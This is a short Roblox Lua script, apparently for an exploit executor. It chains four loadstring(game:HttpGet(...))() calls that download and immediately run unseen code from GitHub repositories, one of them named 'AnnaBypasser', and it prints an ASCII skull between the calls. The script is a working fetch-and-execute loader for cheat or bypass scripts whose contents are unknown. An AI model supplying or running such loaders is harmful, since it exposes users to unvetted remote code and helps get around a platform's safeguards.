loadstring(game:HttpGet("https://raw.githubusercontent.com/iamnoonesodw/Inf-v2/refs/heads/main/Script",true))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/iamnoonesodw/test/refs/heads/main/Test", true))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/iamnoonesodw/test/refs/heads/main/Test2", true))()

print([[                
          .-"      "-.
         /            \
        |              |
        |,  .-.  .-.  ,|
        | )(_o/  \o_)( |
        |/     /\     \|
        (_     ^^     _)
         \__|IIIIII|__/
          | \IIIIII/ |
          \          /
           `--------`
]])


loadstring(game:HttpGet("https://raw.githubusercontent.com/AnnaRoblox/AnnaBypasser/refs/heads/main/AnnaBypasser.lua",true))()
